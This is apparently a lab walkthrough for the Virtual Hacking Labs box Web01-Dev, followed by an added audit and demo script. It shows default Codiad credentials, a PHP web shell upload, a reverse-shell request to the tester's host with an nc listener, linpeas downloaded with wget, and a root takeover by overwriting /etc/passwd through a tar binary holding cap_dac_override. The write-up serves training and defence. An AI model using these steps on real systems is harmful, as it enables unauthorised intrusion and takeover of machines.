VHL — Web01-Dev
Web · Easy · Linux
Development web server running the Codiad IDE on Apache, reachable with its default admin:admin login. Uploading a PHP web shell through the IDE gives a shell as apache; a tar binary carrying cap_dac_override overwrites /etc/passwd for root.
February 8, 2025 · Virtual Hacking Labs
#FTP #Web Shell #File Upload #Apache
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 17:55 EST
Nmap scan report for 10.11.1.6
Host is up (0.021s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 13:26:65:31:6d:fd:90:21:45:05:39:0d:c4:a0:26:1f (RSA)
| 256 0b:c3:57:44:33:fe:2a:1e:a4:73:72:36:1f:0a:89:22 (ECDSA)
|_ 256 c2:70:d5:e9:0b:af:c2:42:fa:51:45:e3:25:4f:2b:a9 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.30)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.30
|_http-title: CODIAD
8080/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.30)
|_http-title: Tiny File Manager
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.30
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/8%OT=21%CT=1%CU=43577%PV=Y%DS=2%DC=I%G=Y%TM=67A7E
OS:0E2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%TS=A)SEQ(SP=101%
OS:GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%II=I%TS=A)OPS
OS:(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST1
OS:1NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 20.92 ms 10.11.1.6
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.37 seconds

21
- allows anonymous login; the listing shows a single pub directory
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub

8080
8080/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.30)
|_http-title: Tiny File Manager
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.30
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION

80
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.30)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.30
|_http-title: CODIAD

default login
admin:admin

webshell
- right-click the project folder in Codiad's file tree and upload a PHP web shell; it is saved under the project's workspace directory, which Apache serves (here /workspace/Web01-Test/shell.php, taking its command in the 0 parameter)

reverse shell
GET /workspace/Web01-Test/shell.php?0=bash+-i+>%26+/dev/tcp/172.16.1.3/1234+0>%261 HTTP/1.1
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.3] from (UNKNOWN) [10.11.1.6] 39884
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache

priv esc
linpeas
bash-4.2$ wget http://172.16.1.3/linpeas.sh
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.23
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 100 127.0.0.1:25 *:*
tcp LISTEN 0 511 [::]:8080 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 32 [::]:21 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 100 [::1]:25 [::]:*

tar capabilities (cap_dac_override)
cap_dac_override in tar's effective set lets it bypass file permission checks, so extracting an archive into /etc overwrites the root-owned /etc/passwd even from the apache account.
Files with capabilities (limited to 50):
/usr/bin/tar = cap_dac_override+ep
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

bash-4.2$ cp /etc/passwd /tmp/passwd

openssl passwd "root"
$1$FvhsWUlE$uw3CQduesP/.sjEy362QA0

The hash goes into the second field of root's entry in place of the x, so su checks it directly instead of consulting /etc/shadow:
root:$1$FvhsWUlE$uw3CQduesP/.sjEy362QA0:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin

bash-4.2$ wget http://172.16.1.3/passwd
bash-4.2$ cat passwd
cat passwd
root:$1$FvhsWUlE$uw3CQduesP/.sjEy362QA0:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin

bash-4.2$ tar -cf /tmp/passwd.tar -C /tmp passwd
bash-4.2$ tar -xf /tmp/passwd.tar -C /etc passwd
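Added example, not from the writeup, covering both the capability finding and the passwd overwrite above. The first function is the check a reviewer would run over getcap output to flag binaries like this tar; the sample lines are the linpeas listing reproduced here. The second reproduces the hash-edit, tar -cf, tar -xf sequence against a scratch directory standing in for /etc, so it runs unprivileged and shows exactly what the extraction step writes. Function names, the scratch layout and the demo passwd contents are assumptions.

```shell
#!/bin/sh
# Added example (not from the writeup): audit file capabilities and
# reproduce the tar/cap_dac_override passwd overwrite in a scratch dir.

# Constructed from the linpeas "Files with capabilities" output above.
SAMPLE_GETCAP='/usr/bin/tar = cap_dac_override+ep
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep'

# Print "path caps" for each binary whose effective set (+e / =e) holds a
# capability that bypasses DAC or changes identity. Permitted-only (+p)
# entries such as ping are skipped: the program must raise them itself.
# Both the older "path = caps" and newer "path caps" getcap layouts parse.
# Every hit still needs a human look; newuidmap/newgidmap are expected on
# a box with user namespaces, tar with cap_dac_override is not.
dangerous_caps() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}
        caps=${line##* }
        case $caps in
            *[+=]*e*) ;;        # effective flag present
            *) continue ;;
        esac
        case $caps in
            *cap_dac_override*|*cap_dac_read_search*|*cap_setuid*|*cap_setgid*|*cap_sys_admin*|*cap_chown*|*cap_fowner*)
                printf '%s %s\n' "$path" "$caps" ;;
        esac
    done
}

# MD5-crypt hash as in the writeup; a fixed salt keeps it reproducible
# (salt FvhsWUlE and password "root" give the hash shown above).
make_md5crypt() {
    # $1 salt, $2 password
    openssl passwd -1 -salt "$1" "$2"
}

# Install $2 as root's hash in $1/passwd the way the writeup does: edit a
# copy, pack it, extract the archive into the target directory. On the
# real box the extraction is the step that needs cap_dac_override: tar
# opens /etc/passwd for writing as uid 48 and the kernel skips the
# 0644 root:root permission check because of the capability.
plant_root_hash() {
    etc=$1; hash=$2
    work=$(mktemp -d) || return 1
    awk -F: -v h="$hash" 'BEGIN { OFS = FS } $1 == "root" { $2 = h } { print }' \
        "$etc/passwd" > "$work/passwd" || { rm -rf "$work"; return 1; }
    tar -cf "$work/passwd.tar" -C "$work" passwd &&
        tar -xf "$work/passwd.tar" -C "$etc" passwd
    rc=$?
    rm -rf "$work"
    return $rc
}

# Second field of root's entry in $1/passwd, for checking the result.
root_hash_in() {
    awk -F: '$1 == "root" { print $2; exit }' "$1/passwd"
}

# Demo: scratch /etc with two constructed entries, plant the writeup's hash.
if [ "${1:-}" = demo ]; then
    scratch=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/bash\napache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin\n' > "$scratch/passwd"
    dangerous_caps "$SAMPLE_GETCAP"
    plant_root_hash "$scratch" '$1$FvhsWUlE$uw3CQduesP/.sjEy362QA0'
    root_hash_in "$scratch"
    rm -rf "$scratch"
fi
```

Run it as `sh script.sh demo`. The fix on the real host is `setcap -r /usr/bin/tar` (and an answer to why it was set); after that the extraction fails with permission denied on /etc/passwd even though the archive is fine.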
bash-4.2$ su root
su root
Password: root
whoami
root
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash: line 2: python3: command not found
python -c 'import pty; pty.spawn("/bin/bash")'
[root@localhost tmp]# whoami
whoami
root
[root@localhost tmp]# cd /root
cd /root
[root@localhost ~]# ls
ls
anaconda-ks.cfg key.txt
[root@localhost ~]# cat key.txt
cat key.txt
H7hgf2kosa72u3fnjkdg